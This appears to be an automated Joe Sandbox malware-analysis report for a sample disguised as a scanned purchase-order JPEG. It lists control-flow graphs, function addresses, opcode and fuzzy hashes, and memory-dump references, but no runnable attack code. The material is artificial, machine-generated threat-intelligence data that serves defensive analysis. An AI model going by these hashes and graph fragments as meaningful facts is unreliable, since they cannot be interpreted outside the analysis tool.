214 12272a2-12272b9 207->214 208->214 210->159 210->202 240 1227362-1227398 211->240 241 1227274-1227279 211->241 212->180 212->211 219 12274e2-12274e4 213->219 220 12274c2-12274c4 213->220 229 12272e4-122730b 214->229 230 12272bb-12272d4 214->230 215->199 216->215 228 12275ad-12275b3 216->228 219->196 223 12274e6-12274e9 219->223 224 12274d3-12274d9 220->224 225 12274c6-12274cb 220->225 223->197 224->156 227 12274db-12274e0 224->227 225->224 227->219 232 12274b6-12274b9 227->232 233 12275b7-12275c3 228->233 234 12275b5 228->234 229->196 247 1227311-1227314 229->247 230->240 245 12272da-12272df 230->245 232->196 232->213 235 12275c5-12275de 233->235 234->235 235->215 252 12275e0-12275e2 235->252 249 12273a5-12273ad 240->249 250 122739a-122739e 240->250 241->240 245->240 247->196 251 122731a-1227343 247->251 249->196 255 12273b3-12273b8 249->255 253 12273a0-12273a3 250->253 254 12273bd-12273c1 250->254 251->240 267 1227345-122734a 251->267 252->199 253->249 253->254 256 12273c3-12273c9 254->256 257 12273e0-12273e4 254->257 255->180 256->257 259 12273cb-12273d3 256->259 260 12273e6-12273ec 257->260 261 12273ee-122740d call 12276f1 257->261 259->196 262 12273d9-12273de 259->262 260->261 264 1227413-1227417 260->264 261->264 262->180 264->180 265 1227419-1227435 264->265 265->180 267->240
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                        • API String ID: 0-2525668591
                                                                                                        • Opcode ID: fed15881c87bf22ae4f4e0655a822b725b9b24ad12e689409ed94f5e6787049d
                                                                                                        • Instruction ID: c5d9d004dd1ee40dc0dd3c1e45af878e7566346be764e53b850bfa677fb07afa
                                                                                                        • Opcode Fuzzy Hash: fed15881c87bf22ae4f4e0655a822b725b9b24ad12e689409ed94f5e6787049d
                                                                                                        • Instruction Fuzzy Hash: 78F15B30A24229EFDB15CFA9D885AADBFB6FF59310F258069E905AB261D730D841CB50
                                                                                                        Function 0122C146 Relevance: 6.5, Strings: 5, Instructions: 225COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 379 122c146-122c158 380 122c184 379->380 381 122c15a-122c172 379->381 382 122c186-122c18a 380->382 385 122c174-122c179 381->385 386 122c17b-122c17e 381->386 385->382 387 122c180-122c182 386->387 388 122c18b-122c199 386->388 387->380 387->381 390 122c1c0-122c1c1 388->390 391 122c19b-122c1a1 388->391 393 122c1c8 390->393 392 122c1a3-122c1bf 391->392 391->393 392->390 394 122c1ca 393->394 395 122c1cf-122c2ac call 12241a0 call 1223cc0 393->395 394->395 405 122c2b3-122c2d4 call 1225658 395->405 406 122c2ae 395->406 408 122c2d9-122c2e4 405->408 406->405 409 122c2e6 408->409 410 122c2eb-122c2ef 408->410 409->410 411 122c2f1-122c2f2 410->411 412 122c2f4-122c2fb 410->412 413 122c313-122c357 411->413 414 122c302-122c310 412->414 415 122c2fd 412->415 419 122c3bd-122c3d4 413->419 414->413 415->414 421 122c3d6-122c3fb 419->421 422 122c359-122c36f 419->422 431 122c413 421->431 432 122c3fd-122c412 421->432 426 122c371-122c37d 422->426 427 122c399 422->427 428 122c387-122c38d 426->428 429 122c37f-122c385 426->429 430 122c39f-122c3bc 427->430 433 122c397 428->433 429->433 430->419 432->431 433->430
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 1c1150b7a4935084c2a576d23582e83ca52fec15e7a0ac70ef10871a8fde6ed3
                                                                                                        • Instruction ID: 9cfdec8271134270272768043f9ead073c8e28d456a9f04dbb11d133eb0f4a4e
                                                                                                        • Opcode Fuzzy Hash: 1c1150b7a4935084c2a576d23582e83ca52fec15e7a0ac70ef10871a8fde6ed3
                                                                                                        • Instruction Fuzzy Hash: 4EA1F675E10218DFDB18DFAAD884A9DBBF2BF89300F148069E518EB365DB709981CF50
                                                                                                        Function 0122D278 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 437 122d278-122d284 438 122d286-122d2a8 437->438 439 122d2dd-122d38c call 12241a0 call 1223cc0 437->439 440 122d2aa 438->440 441 122d2af-122d2dc 438->441 451 122d393-122d3b4 call 1225658 439->451 452 122d38e 439->452 440->441 441->439 454 122d3b9-122d3c4 451->454 452->451 455 122d3c6 454->455 456 122d3cb-122d3cf 454->456 455->456 457 122d3d1-122d3d2 456->457 458 122d3d4-122d3db 456->458 459 122d3f3-122d437 457->459 460 122d3e2-122d3f0 458->460 461 122d3dd 458->461 465 122d49d-122d4b4 459->465 460->459 461->460 467 122d4b6-122d4db 465->467 468 122d439-122d44f 465->468 474 122d4f3 467->474 475 122d4dd-122d4f2 467->475 472 122d451-122d45d 468->472 473 122d479 468->473 476 122d467-122d46d 472->476 477 122d45f-122d465 472->477 478 122d47f-122d49c 473->478 475->474 479 122d477 476->479 477->479 478->465 479->478
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 4a391e99b2c7fb608074a0dd5ac002d43266432502fcd188376d216a40d6f6c0
                                                                                                        • Instruction ID: a6b84e7cbf410f9a7e6c5c80ab104f6a61e493d2d69925b82e15a7b1adc83579
                                                                                                        • Opcode Fuzzy Hash: 4a391e99b2c7fb608074a0dd5ac002d43266432502fcd188376d216a40d6f6c0
                                                                                                        • Instruction Fuzzy Hash: DE81C574E11218DFDB14DFAAD884A9DBBF2FF49310F148069E518AB365DB74A981CF10
                                                                                                        Function 0122CCD8 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 483 122ccd8-122cd08 484 122cd0a 483->484 485 122cd0f-122cdec call 12241a0 call 1223cc0 483->485 484->485 495 122cdf3-122ce14 call 1225658 485->495 496 122cdee 485->496 498 122ce19-122ce24 495->498 496->495 499 122ce26 498->499 500 122ce2b-122ce2f 498->500 499->500 501 122ce31-122ce32 500->501 502 122ce34-122ce3b 500->502 503 122ce53-122ce97 501->503 504 122ce42-122ce50 502->504 505 122ce3d 502->505 509 122cefd-122cf14 503->509 504->503 505->504 511 122cf16-122cf3b 509->511 512 122ce99-122ceaf 509->512 519 122cf53 511->519 520 122cf3d-122cf52 511->520 516 122ceb1-122cebd 512->516 517 122ced9 512->517 521 122cec7-122cecd 516->521 522 122cebf-122cec5 516->522 518 122cedf-122cefc 517->518 518->509 520->519 523 122ced7 521->523 522->523 523->518
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 3d1d38b9b7f70ce149da0d0a9311058f1c99de6ed077f2eed7fb7e0cc22ea862
                                                                                                        • Instruction ID: fd0e94831e26dd0134514420c1b6ede20e3460d7f34c02c4966575e947bdcc5d
                                                                                                        • Opcode Fuzzy Hash: 3d1d38b9b7f70ce149da0d0a9311058f1c99de6ed077f2eed7fb7e0cc22ea862
                                                                                                        • Instruction Fuzzy Hash: 1981C274E10218DFDB18DFAAD984A9DBBF2BF88300F14C069E419AB365DB749981CF50
                                                                                                        Function 01225370 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 527 1225370-12253a0 528 12253a2 527->528 529 12253a7-1225484 call 12241a0 call 1223cc0 527->529 528->529 539 1225486 529->539 540 122548b-12254a9 529->540 539->540 570 12254ac call 1225658 540->570 571 12254ac call 1225649 540->571 541 12254b2-12254bd 542 12254c4-12254c8 541->542 543 12254bf 541->543 544 12254ca-12254cb 542->544 545 12254cd-12254d4 542->545 543->542 546 12254ec-1225530 544->546 547 12254d6 545->547 548 12254db-12254e9 545->548 552 1225596-12255ad 546->552 547->548 548->546 554 1225532-1225548 552->554 555 12255af-12255d4 552->555 559 1225572 554->559 560 122554a-1225556 554->560 561 12255d6-12255eb 555->561 562 12255ec 555->562 565 1225578-1225595 559->565 563 1225560-1225566 560->563 564 1225558-122555e 560->564 561->562 566 1225570 563->566 564->566 565->552 566->565 570->541 571->541
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 383ff4641e74fef9fab4ea0c246a813d99a8c4d50745f73bd3fe949b0b852342
                                                                                                        • Instruction ID: 0044423c555a85e866b9619409617008dd952e50106285ed4bb9d5b596f4eaa4
                                                                                                        • Opcode Fuzzy Hash: 383ff4641e74fef9fab4ea0c246a813d99a8c4d50745f73bd3fe949b0b852342
                                                                                                        • Instruction Fuzzy Hash: A081A474E10218DFDB18DFAAD984A9DBBF2BF88300F14C069E419AB365DB749985CF50
                                                                                                        Function 0122C468 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 572 122c468-122c471 573 122c473-122c491 572->573 574 122c498 572->574 573->574 575 122c49a 574->575 576 122c49f-122c57c call 12241a0 call 1223cc0 574->576 575->576 586 122c583-122c5a4 call 1225658 576->586 587 122c57e 576->587 589 122c5a9-122c5b4 586->589 587->586 590 122c5b6 589->590 591 122c5bb-122c5bf 589->591 590->591 592 122c5c1-122c5c2 591->592 593 122c5c4-122c5cb 591->593 594 122c5e3-122c627 592->594 595 122c5d2-122c5e0 593->595 596 122c5cd 593->596 600 122c68d-122c6a4 594->600 595->594 596->595 602 122c6a6-122c6cb 600->602 603 122c629-122c63f 600->603 609 122c6e3 602->609 610 122c6cd-122c6e2 602->610 607 122c641-122c64d 603->607 608 122c669 603->608 611 122c657-122c65d 607->611 612 122c64f-122c655 607->612 613 122c66f-122c68c 608->613 610->609 614 122c667 611->614 612->614 613->600 614->613
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 06d1ec13275f94e60db054f534712c415878470c8347103bdcba2df19f3bae01
                                                                                                        • Instruction ID: d027c7c7cb6c30d47b4e72fb9a188855a046d11a177886fbf67e83e687395094
                                                                                                        • Opcode Fuzzy Hash: 06d1ec13275f94e60db054f534712c415878470c8347103bdcba2df19f3bae01
                                                                                                        • Instruction Fuzzy Hash: 0D81D674E10219DFDB18DFAAD984A9DBBF2BF88300F14D069E418AB365DB749981CF50
                                                                                                        Function 0122CA08 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 618 122ca08-122ca38 619 122ca3a 618->619 620 122ca3f-122cb1c call 12241a0 call 1223cc0 618->620 619->620 630 122cb23-122cb44 call 1225658 620->630 631 122cb1e 620->631 633 122cb49-122cb54 630->633 631->630 634 122cb56 633->634 635 122cb5b-122cb5f 633->635 634->635 636 122cb61-122cb62 635->636 637 122cb64-122cb6b 635->637 638 122cb83-122cbc7 636->638 639 122cb72-122cb80 637->639 640 122cb6d 637->640 644 122cc2d-122cc44 638->644 639->638 640->639 646 122cc46-122cc6b 644->646 647 122cbc9-122cbdf 644->647 653 122cc83 646->653 654 122cc6d-122cc82 646->654 651 122cbe1-122cbed 647->651 652 122cc09 647->652 655 122cbf7-122cbfd 651->655 656 122cbef-122cbf5 651->656 657 122cc0f-122cc2c 652->657 654->653 658 122cc07 655->658 656->658 657->644 658->657
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: fb2a6dbec04b2616240609fafd816fe0d06d254000897003110df0333512923c
                                                                                                        • Instruction ID: 543df177d560a10cb68945af4bb4ac72d6612cbca6e451652377d0365159e1ba
                                                                                                        • Opcode Fuzzy Hash: fb2a6dbec04b2616240609fafd816fe0d06d254000897003110df0333512923c
                                                                                                        • Instruction Fuzzy Hash: 8D81C374E10218DFDB18DFAAD884A9DBBF2BF88300F14C069E418AB365DB749981CF50
                                                                                                        Function 0122C738 Relevance: 6.4, Strings: 5, Instructions: 182COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 662 122c738-122c768 663 122c76a 662->663 664 122c76f-122c84c call 12241a0 call 1223cc0 662->664 663->664 674 122c853-122c874 call 1225658 664->674 675 122c84e 664->675 677 122c879-122c884 674->677 675->674 678 122c886 677->678 679 122c88b-122c88f 677->679 678->679 680 122c891-122c892 679->680 681 122c894-122c89b 679->681 682 122c8b3-122c8f7 680->682 683 122c8a2-122c8b0 681->683 684 122c89d 681->684 688 122c95d-122c974 682->688 683->682 684->683 690 122c976-122c99b 688->690 691 122c8f9-122c90f 688->691 697 122c9b3 690->697 698 122c99d-122c9b2 690->698 695 122c911-122c91d 691->695 696 122c939 691->696 699 122c927-122c92d 695->699 700 122c91f-122c925 695->700 701 122c93f-122c95c 696->701 698->697 702 122c937 699->702 700->702 701->688 702->701
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: f65bdfda61ce6b2da1799f8b2fc5a344f16a642cfce3bb7c05f4851638638193
                                                                                                        • Instruction ID: 6975aae458567d415cdc6be23dc2824dfaad9641f12f113c0b3b1f370d8f09ed
                                                                                                        • Opcode Fuzzy Hash: f65bdfda61ce6b2da1799f8b2fc5a344f16a642cfce3bb7c05f4851638638193
                                                                                                        • Instruction Fuzzy Hash: 7781D374E10218DFDB18DFAAD984A9DBBF2BF88310F14C069E418AB365DB749981CF51
                                                                                                        Function 0122CFAA Relevance: 6.4, Strings: 5, Instructions: 182COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 706 122cfaa-122cfd8 707 122cfda 706->707 708 122cfdf-122d0bc call 12241a0 call 1223cc0 706->708 707->708 718 122d0c3-122d0e4 call 1225658 708->718 719 122d0be 708->719 721 122d0e9-122d0f4 718->721 719->718 722 122d0f6 721->722 723 122d0fb-122d0ff 721->723 722->723 724 122d101-122d102 723->724 725 122d104-122d10b 723->725 726 122d123-122d167 724->726 727 122d112-122d120 725->727 728 122d10d 725->728 732 122d1cd-122d1e4 726->732 727->726 728->727 734 122d1e6-122d20b 732->734 735 122d169-122d17f 732->735 741 122d223 734->741 742 122d20d-122d222 734->742 739 122d181-122d18d 735->739 740 122d1a9 735->740 743 122d197-122d19d 739->743 744 122d18f-122d195 739->744 745 122d1af-122d1cc 740->745 742->741 746 122d1a7 743->746 744->746 745->732 746->745
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: dcf12d28709d3ad99011a307b39622dee0bc8049a880aa3393cbf40be6f6c30b
                                                                                                        • Instruction ID: 79532250f7a1841a980db7b93cc83634164e45ae3ae29289980457dc97f90df4
                                                                                                        • Opcode Fuzzy Hash: dcf12d28709d3ad99011a307b39622dee0bc8049a880aa3393cbf40be6f6c30b
                                                                                                        • Instruction Fuzzy Hash: 9481C974E10218DFDB18DFAAD984A9DBBF2BF88310F14C069E419AB365DB749981CF10
                                                                                                        Function 012229EC Relevance: 5.5, Strings: 4, Instructions: 490COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 750 12229ec-12229f6 752 1222981-122298a 750->752 753 12229f8-1222a01 750->753 754 1222990-1222999 752->754 753->754 755 1222a03-1222a3b 753->755 760 12229a0-12229c8 754->760 758 1222a5d-1222aac 755->758 759 1222a3d-1222a5c 755->759 765 1222ac7-1222acf 758->765 766 1222aae-1222ab5 758->766 769 1222ad2-1222ae6 765->769 767 1222ab7-1222abc 766->767 768 1222abe-1222ac5 766->768 767->769 768->769 772 1222ae8-1222aef 769->772 773 1222afc-1222b04 769->773 774 1222af1-1222af3 772->774 775 1222af5-1222afa 772->775 776 1222b06-1222b0a 773->776 774->776 775->776 778 1222b6a-1222b6d 776->778 779 1222b0c-1222b21 776->779 780 1222bb5-1222bbb 778->780 781 1222b6f-1222b84 778->781 779->778 787 1222b23-1222b26 779->787 782 1222bc1-1222bc3 780->782 783 12236b6 780->783 781->780 791 1222b86-1222b8a 781->791 782->783 785 1222bc9-1222bce 782->785 788 12236bb-1223700 783->788 789 1223664-1223668 785->789 790 1222bd4 785->790 792 1222b45-1222b63 call 12202c8 787->792 793 1222b28-1222b2a 787->793 810 1223702-1223728 788->810 811 122372e-1223874 788->811 795 122366a-122366d 789->795 796 122366f-12236b5 789->796 790->789 797 1222b92-1222bb0 call 12202c8 791->797 798 1222b8c-1222b90 791->798 792->778 793->792 799 1222b2c-1222b2f 793->799 795->788 795->796 797->780 798->780 798->797 799->778 800 1222b31-1222b43 799->800 800->778 800->792 810->811 813 12238a6-12238a9 811->813 814 1223876-1223878 811->814 815 12238aa-12238bc 813->815 814->815 818 122387a-12238a3 814->818 819 12238ee-12238f4 815->819 820 12238be-12238eb 815->820 818->813 822 12238f6-1223908 819->822 823 1223928-1223937 819->823 820->819 825 122393a-122393d 822->825 826 122390a-122390c 822->826 823->825 827 122393e-1223941 825->827 826->827 828 122390e-1223910 826->828 829 1223942-12239e8 827->829 828->829 830 1223912-1223927 828->830 830->823
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                        • API String ID: 0-2732225958
                                                                                                        • Opcode ID: d8852315a067798ef15f6fe65c8dd647be73a1b60ded5c07cf9cd64690827275
                                                                                                        • Instruction ID: c4be666ff2d77ca48dd191b7f5fc0b5ded13c4377ae7c1da277114c885e0f502
                                                                                                        • Opcode Fuzzy Hash: d8852315a067798ef15f6fe65c8dd647be73a1b60ded5c07cf9cd64690827275
                                                                                                        • Instruction Fuzzy Hash: CF0224729287D19FC7638F38C4662AABF70EF4B214B184DDDC4C15E112E23A5892CB86
                                                                                                        Function 06919328 Relevance: 3.5, APIs: 2, Instructions: 530libraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1463 6919328-6919338 1464 691933a 1463->1464 1465 691933f-691934b 1463->1465 1466 691946b-6919475 1464->1466 1468 6919352-6919367 1465->1468 1469 691934d 1465->1469 1472 691947b-69194bb 1468->1472 1473 691936d-6919378 1468->1473 1469->1466 1490 69194c2-6919577 1472->1490 1476 6919476 1473->1476 1477 691937e-6919385 1473->1477 1476->1472 1479 69193b2-69193bd 1477->1479 1480 6919387-691939e 1477->1480 1484 69193ca-69193d4 1479->1484 1485 69193bf-69193c7 1479->1485 1480->1490 1491 69193a4-69193a7 1480->1491 1492 69193da-69193e4 1484->1492 1493 691945e-6919463 1484->1493 1485->1484 1520 6919579 1490->1520 1521 691957e-6919614 LdrInitializeThunk 1490->1521 1491->1476 1495 69193ad-69193b0 1491->1495 1492->1476 1500 69193ea-6919406 1492->1500 1493->1466 1495->1479 1495->1480 1505 6919408 1500->1505 1506 691940a-691940d 1500->1506 1505->1466 1508 6919414-6919417 1506->1508 1509 691940f-6919412 1506->1509 1510 691941a-6919428 1508->1510 1509->1510 1510->1476 1513 691942a-6919431 1510->1513 1513->1466 1515 6919433-6919439 1513->1515 1515->1476 1516 691943b-6919440 1515->1516 1516->1476 1518 6919442-6919455 1516->1518 1518->1476 1523 6919457-691945a 1518->1523 1520->1521 1524 69196b3-69196b9 1521->1524 1523->1515 1525 691945c 1523->1525 1526 6919619-691962c 1524->1526 1527 69196bf-69196d7 1524->1527 1525->1466 1528 6919633-6919684 1526->1528 1529 691962e 1526->1529 1530 69196d9-69196e6 1527->1530 1531 69196eb-69196fe 1527->1531 1548 6919697-69196a9 1528->1548 1549 6919686-6919694 1528->1549 1529->1528 1534 6919a81-6919b7e 1530->1534 1532 6919700 1531->1532 1533 6919705-6919721 1531->1533 1532->1533 1536 6919723 1533->1536 1537 6919728-691974c 1533->1537 1539 6919b80-6919b85 1534->1539 1540 6919b86-6919b90 1534->1540 1536->1537 1544 6919753-6919785 1537->1544 1545 691974e 1537->1545 1539->1540 1553 6919787 1544->1553 1554 691978c-69197ce 1544->1554 1545->1544 1550 69196b0 1548->1550 1551 69196ab 1548->1551 1549->1527 1550->1524 1551->1550 1553->1554 1556 69197d0 1554->1556 1557 69197d5-69197de 1554->1557 1556->1557 1558 6919a06-6919a0c 1557->1558 1559 69197e3-6919808 1558->1559 1560 6919a12-6919a25 1558->1560 1561 691980a 1559->1561 1562 691980f-6919846 1559->1562 1563 6919a27 1560->1563 1564 6919a2c-6919a47 1560->1564 1561->1562 1572 6919848 1562->1572 1573 691984d-691987f 1562->1573 1563->1564 1565 6919a49 1564->1565 1566 6919a4e-6919a62 1564->1566 1565->1566 1570 6919a64 1566->1570 1571 6919a69-6919a7f LdrInitializeThunk 1566->1571 1570->1571 1571->1534 1572->1573 1575 6919881-69198a6 1573->1575 1576 69198e3-69198f6 1573->1576 1579 69198a8 1575->1579 1580 69198ad-69198db 1575->1580 1577 69198f8 1576->1577 1578 69198fd-6919922 1576->1578 1577->1578 1583 6919931-6919969 1578->1583 1584 6919924-6919925 1578->1584 1579->1580 1580->1576 1585 6919970-69199d1 call 6919328 1583->1585 1586 691996b 1583->1586 1584->1560 1592 69199d3 1585->1592 1593 69199d8-69199fc 1585->1593 1586->1585 1592->1593 1596 6919a03 1593->1596 1597 69199fe 1593->1597 1596->1558 1597->1596
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4147168772.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_6910000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f41c237645b9a1ecf15303ec56cd29e0854c3b7a6c88fc01992b09c363be0169
                                                                                                        • Instruction ID: df72469d458439a752421da929ffda15f1332c9c82dbeafb19bb49c2615b3e1d
                                                                                                        • Opcode Fuzzy Hash: f41c237645b9a1ecf15303ec56cd29e0854c3b7a6c88fc01992b09c363be0169
                                                                                                        • Instruction Fuzzy Hash: 17224D70E00219CFDB54DFA9C994B9DBBB2BF88300F2485A9E419AB395DB349D85CF50
                                                                                                        Function 0122A088 Relevance: 3.4, Strings: 2, Instructions: 892COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$4'^q
                                                                                                        • API String ID: 0-273632683
                                                                                                        • Opcode ID: 31ea426e14f23154315e0fd44ff28c1ba43547ae959c4afc85b2dd18b4d3ce40
                                                                                                        • Instruction ID: d46597cd43f8b0d19ca652397ae21c91d8eac5e24060dac8f32fe9c092174fae
                                                                                                        • Opcode Fuzzy Hash: 31ea426e14f23154315e0fd44ff28c1ba43547ae959c4afc85b2dd18b4d3ce40
                                                                                                        • Instruction Fuzzy Hash: C9828E71A1021AEFCB15CFA8C984AAEBBF2FF88310F158955E5059BB62D770ED41CB50
                                                                                                        Function 012269A0 Relevance: 3.0, Strings: 2, Instructions: 510COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$Hbq
                                                                                                        • API String ID: 0-662517225
                                                                                                        • Opcode ID: fa3a982af64b8ae281cd527ec95f5f3d8f4abf73f5957ade2cb31cd8bfabce9e
                                                                                                        • Instruction ID: 5a68dd2273580ae439b6803716633f1dc9cb130a6d63c82510457cfaae9226c4
                                                                                                        • Opcode Fuzzy Hash: fa3a982af64b8ae281cd527ec95f5f3d8f4abf73f5957ade2cb31cd8bfabce9e
                                                                                                        • Instruction Fuzzy Hash: 4012AE71A102299FDB19DF69C894BAEBBF6BF88304F148529E9059B391DF309D41CB80
                                                                                                        Function 01223E09 Relevance: 2.8, Strings: 2, Instructions: 267COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
